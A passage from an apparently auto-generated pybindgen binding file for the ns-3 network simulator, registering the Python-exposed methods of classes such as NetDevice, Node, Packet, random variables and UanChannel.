## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'address')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3NixVector_methods(root_module, cls):
cls.add_output_stream_operator()
## nix-vector.h (module 'network'): ns3::NixVector::NixVector() [constructor]
cls.add_constructor([])
## nix-vector.h (module 'network'): ns3::NixVector::NixVector(ns3::NixVector const & o) [copy constructor]
cls.add_constructor([param('ns3::NixVector const &', 'o')])
## nix-vector.h (module 'network'): void ns3::NixVector::AddNeighborIndex(uint32_t newBits, uint32_t numberOfBits) [member function]
cls.add_method('AddNeighborIndex',
'void',
[param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::BitCount(uint32_t numberOfNeighbors) const [member function]
cls.add_method('BitCount',
'uint32_t',
[param('uint32_t', 'numberOfNeighbors')],
is_const=True)
## nix-vector.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::NixVector::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Deserialize(uint32_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint32_t const *', 'buffer'), param('uint32_t', 'size')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::ExtractNeighborIndex(uint32_t numberOfBits) [member function]
cls.add_method('ExtractNeighborIndex',
'uint32_t',
[param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetRemainingBits() [member function]
cls.add_method('GetRemainingBits',
'uint32_t',
[])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Serialize(uint32_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3Node_methods(root_module, cls):
## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Node const &', 'arg0')])
## node.h (module 'network'): ns3::Node::Node() [constructor]
cls.add_constructor([])
## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor]
cls.add_constructor([param('uint32_t', 'systemId')])
## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function]
cls.add_method('AddApplication',
'uint32_t',
[param('ns3::Ptr< ns3::Application >', 'application')])
## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddDevice',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function]
cls.add_method('ChecksumEnabled',
'bool',
[],
is_static=True)
## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function]
cls.add_method('GetApplication',
'ns3::Ptr< ns3::Application >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function]
cls.add_method('GetNApplications',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('RegisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function]
cls.add_method('RegisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')])
## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('UnregisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function]
cls.add_method('UnregisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')])
## node.h (module 'network'): void ns3::Node::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## node.h (module 'network'): void ns3::Node::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3NormalRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::INFINITE_VALUE [variable]
cls.add_static_attribute('INFINITE_VALUE', 'double const', is_const=True)
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::NormalRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::NormalRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetVariance() const [member function]
cls.add_method('GetVariance',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue(double mean, double variance, double bound=ns3::NormalRandomVariable::INFINITE_VALUE) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'variance'), param('double', 'bound', default_value='ns3::NormalRandomVariable::INFINITE_VALUE')])
## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger(uint32_t mean, uint32_t variance, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'variance'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3ObjectFactoryChecker_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')])
return
def register_Ns3ObjectFactoryValue_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'value')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function]
cls.add_method('Get',
'ns3::ObjectFactory',
[],
is_const=True)
## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::ObjectFactory const &', 'value')])
return
def register_Ns3Packet_methods(root_module, cls):
cls.add_output_stream_operator()
## packet.h (module 'network'): ns3::Packet::Packet() [constructor]
cls.add_constructor([])
## packet.h (module 'network'): ns3::Packet::Packet(ns3::Packet const & o) [copy constructor]
cls.add_constructor([param('ns3::Packet const &', 'o')])
## packet.h (module 'network'): ns3::Packet::Packet(uint32_t size) [constructor]
cls.add_constructor([param('uint32_t', 'size')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size, bool magic) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size'), param('bool', 'magic')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddAtEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## packet.h (module 'network'): void ns3::Packet::AddByteTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddByteTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddHeader(ns3::Header const & header) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header')])
## packet.h (module 'network'): void ns3::Packet::AddPacketTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddPacketTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddPaddingAtEnd(uint32_t size) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddTrailer(ns3::Trailer const & trailer) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer')])
## packet.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::Packet::BeginItem() const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## packet.h (module 'network'): static void ns3::Packet::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet.h (module 'network'): static void ns3::Packet::EnablePrinting() [member function]
cls.add_method('EnablePrinting',
'void',
[],
is_static=True)
## packet.h (module 'network'): bool ns3::Packet::FindFirstMatchingByteTag(ns3::Tag & tag) const [member function]
cls.add_method('FindFirstMatchingByteTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator ns3::Packet::GetByteTagIterator() const [member function]
cls.add_method('GetByteTagIterator',
'ns3::ByteTagIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::Packet::GetNixVector() const [member function]
cls.add_method('GetNixVector',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator ns3::Packet::GetPacketTagIterator() const [member function]
cls.add_method('GetPacketTagIterator',
'ns3::PacketTagIterator',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint64_t ns3::Packet::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet.h (module 'network'): uint8_t const * ns3::Packet::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
deprecated=True, is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekHeader(ns3::Header & header) const [member function]
cls.add_method('PeekHeader',
'uint32_t',
[param('ns3::Header &', 'header')],
is_const=True)
## packet.h (module 'network'): bool ns3::Packet::PeekPacketTag(ns3::Tag & tag) const [member function]
cls.add_method('PeekPacketTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('PeekTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): void ns3::Packet::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintByteTags(std::ostream & os) const [member function]
cls.add_method('PrintByteTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintPacketTags(std::ostream & os) const [member function]
cls.add_method('PrintPacketTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::RemoveAllByteTags() [member function]
cls.add_method('RemoveAllByteTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAllPacketTags() [member function]
cls.add_method('RemoveAllPacketTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAtEnd(uint32_t size) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::RemoveAtStart(uint32_t size) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveHeader(ns3::Header & header) [member function]
cls.add_method('RemoveHeader',
'uint32_t',
[param('ns3::Header &', 'header')])
## packet.h (module 'network'): bool ns3::Packet::RemovePacketTag(ns3::Tag & tag) [member function]
cls.add_method('RemovePacketTag',
'bool',
[param('ns3::Tag &', 'tag')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('RemoveTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): uint32_t ns3::Packet::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::SetNixVector(ns3::Ptr<ns3::NixVector> arg0) [member function]
cls.add_method('SetNixVector',
'void',
[param('ns3::Ptr< ns3::NixVector >', 'arg0')])
return
def register_Ns3ParetoRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ParetoRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable::ParetoRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetShape() const [member function]
cls.add_method('GetShape',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue(double mean, double shape, double bound) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'shape'), param('double', 'bound')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger(uint32_t mean, uint32_t shape, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'shape'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3PointerChecker_methods(root_module, cls):
## pointer.h (module 'core'): ns3::PointerChecker::PointerChecker() [constructor]
cls.add_constructor([])
## pointer.h (module 'core'): ns3::PointerChecker::PointerChecker(ns3::PointerChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PointerChecker const &', 'arg0')])
## pointer.h (module 'core'): ns3::TypeId ns3::PointerChecker::GetPointeeTypeId() const [member function]
cls.add_method('GetPointeeTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3PointerValue_methods(root_module, cls):
## pointer.h (module 'core'): ns3::PointerValue::PointerValue(ns3::PointerValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PointerValue const &', 'arg0')])
## pointer.h (module 'core'): ns3::PointerValue::PointerValue() [constructor]
cls.add_constructor([])
## pointer.h (module 'core'): ns3::PointerValue::PointerValue(ns3::Ptr<ns3::Object> object) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Object >', 'object')])
## pointer.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::PointerValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## pointer.h (module 'core'): bool ns3::PointerValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## pointer.h (module 'core'): ns3::Ptr<ns3::Object> ns3::PointerValue::GetObject() const [member function]
cls.add_method('GetObject',
'ns3::Ptr< ns3::Object >',
[],
is_const=True)
## pointer.h (module 'core'): std::string ns3::PointerValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## pointer.h (module 'core'): void ns3::PointerValue::SetObject(ns3::Ptr<ns3::Object> object) [member function]
cls.add_method('SetObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'object')])
return
def register_Ns3TimeChecker_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeChecker::TimeChecker(ns3::TimeChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeChecker const &', 'arg0')])
return
def register_Ns3TimeValue_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
cls.add_constructor([param('ns3::Time const &', 'value')])
## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
cls.add_method('Get',
'ns3::Time',
[],
is_const=True)
## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Time const &', 'value')])
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3UanChannel_methods(root_module, cls):
## uan-channel.h (module 'uan'): ns3::UanChannel::UanChannel(ns3::UanChannel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanChannel const &', 'arg0')])
## uan-channel.h (module 'uan'): ns3::UanChannel::UanChannel() [constructor]
cls.add_constructor([])
## uan-channel.h (module 'uan'): void ns3::UanChannel::AddDevice(ns3::Ptr<ns3::UanNetDevice> dev, ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('AddDevice',
'void',
[param('ns3::Ptr< ns3::UanNetDevice >', 'dev'), param('ns3::Ptr< ns3::UanTransducer >', 'trans')])
## uan-channel.h (module 'uan'): void ns3::UanChannel::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## uan-channel.h (module 'uan'): ns3::Ptr<ns3::NetDevice> ns3::UanChannel::GetDevice(uint32_t i) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## uan-channel.h (module 'uan'): uint32_t ns3::UanChannel::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-channel.h (module 'uan'): double ns3::UanChannel::GetNoiseDbHz(double fKhz) [member function]
cls.add_method('GetNoiseDbHz',
'double',
[param('double', 'fKhz')])
## uan-channel.h (module 'uan'): static ns3::TypeId ns3::UanChannel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-channel.h (module 'uan'): void ns3::UanChannel::SetNoiseModel(ns3::Ptr<ns3::UanNoiseModel> noise) [member function]
